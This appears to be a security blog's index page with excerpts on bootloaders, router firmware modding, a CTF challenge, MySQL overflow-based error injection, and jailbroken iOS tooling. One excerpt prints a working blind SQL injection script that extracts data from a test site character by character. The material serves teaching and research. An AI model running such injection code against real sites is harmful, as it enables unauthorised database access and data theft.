This is old vulnerability I found in Informatica and got fixed recently. Honestly I’ve been a bit away from bug hunting due to studies and all. Well, stay tuned, found some cool bugs in few sites and products. Will disclose shortly 🙂
This is old vulnerability I found in Informatica and got fixed recently. Honestly I’ve been a bit away from bug hunting due to studies and all. Well, stay tuned, found some cool bugs in few sites and products. Will disclose shortly 🙂
A bootloader is a special program that is executed each time a bootable device is initialized by the computer during its power on or reset that will load the kernel image into the memory. This application is very close to hardware and to the architecture of the CPU. All x86 PCs boot in Real Mode. In this mode you have only 16-bit instructions. Our bootloader runs in Real Mode and our bootloader is a 16-bit program.
https://manybutfinite.com/img/boot/bootProcess.png
When you switch on the PC the BIOS want to boot up an OS which must be found somewhere in hard disks, floppy disk, CDs, etc. The order in which BIOS searches an OS is user configurable. Next the BIOS reads the first 512 byte sector of the bootable disk. Usually a sector is 512 bytes in size. This is known as the Master Boot Record (MBR). BIOS simply loads the contents of the MBR into memory location “0x7c00” and jumps to that location to start executing whatever code is in the MBR. Our bootloader should be 512 bytes in size as well.
https://manybutfinite.com/img/boot/masterBootRecord.png
(more…)
Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.
This post is all about modifying your existing router firmware to perform cool things.
Hardware and Tools Needed:
For the router, I am using a TP-Link MR3020. You may use whatever router you like but make sure you won’t brick your device after or while uploading the modified firmware. Also make sure your firmware can be reversed and dumped using the FMK (Firmware Mod Kit).
Download Firmware Mod Kit
(more…)
Here‘s a cool challenge by Ryscrow of Root-Me . The challenge says
For this challenge you will need to decypher a simple XORed picture. This BMP picture was mistakenly encrypted. Can you recover it ?
The file name is “ch3.bmp” and let’s open in a hex editor and see. I first inspected the first 20 bytes and we can see a string saying “fallen”. Actually I guessed this key of length 6.
This is A simple utility to convert EXE files to PNG images and vice versa. This is written using Java 8. Inspired by this article.
Putty.exe converted to an image using green pixels.
Download:
https://github.com/OsandaMalith/Exe2Image/releases
This tool was added to PentestBox : https://modules.pentestbox.com/#forensics
Softpedia:
http://www.softpedia.com/get/Security/Encrypting/EXE-to-Image-Converter.shtml
Other Shares:
http://www.kitploit.com/2017/09/exe2image-simple-utility-to-convert-exe.html
There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.
This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py
import urllib2 import re # CC-BY: Osanda Malith Jayathissa (@OsandaMalith) # https://creativecommons.org/licenses/by/2.0/ url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target payload = '(select user())'; # your payload trueString = 'Blad3' # Text or html in the true condition maxLength = 20 result = '' for i in range(1, maxLength + 1): for j in range(32, 127): if(chr(j).isupper()): continue sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -" target = url + sql req = urllib2.Request(target) # If cookies exists # req.add_header('Cookie','value=1;value=2') page = urllib2.urlopen(req) html = page.read() try: re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1) print ('Found: ' + chr(j)) result += chr(j) except: pass print (result)
This is another overflow in the DOUBLE data type in MySQL I found. You can refer to my previous post on BIGINT Overflow Error based injections if you want to understand exploiting overflows in extracting data. Also the queries are similar to my previous post. When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.
mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
The exp is the opposite of the ln and log functions of MySQL. If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to: \(e \approx 2.71828183\) .
\(ln(15) = log_ {e} (15) = 2.70805020110221 \)
(more…)
I recently entered the world of mobile security and pen-testing. I wanted to install GCC in a jailbroken iOS 8.3 and had to face lots of issues in finding the correct package for it. So I somehow managed to install and run my own C apps 🙂 I thought of sharing this with you, if you are too struggling like me here’s how I managed to install this.
First install OpenSSH and essential bash commands like apt-get, sed, ps, etc. After that you have to install few debian packages along with gcc. Download this zip file I made and drop it into any folder in your iPhone using a SFTP connection or a desktop file browser. After that install all the packages in it.
[code language=”bash”]
$ dpkg -i *.deb
[/code]
(more…)
I was interested in finding out new techniques that we can use in extracting data via MySQL errors. This is a detailed write-up which will make you understand how I made these queries. When we look how MySQL handles integers I was interested in causing overflows. This is how MySQL stores integers.
(Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html)
These overflow errors will cause in MySQL versions 5.5.5 and above only. In below versions integer overflows would result in a silent wraparound.
The data type BIGINT is of 8 bytes in size which means it’s of 64 bits. If we take the maximum signed value of a BIGINT its “0b0111111111111111111111111111111111111111111111111111111111111111”, “0x7fffffffffffffff”, “9223372036854775807” in binary, hex and decimal respectively. Once we evaluate numerical expressions on this value like adding will cause a “BIGINT value is out of range” error.
mysql> select 9223372036854775807+1;
ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'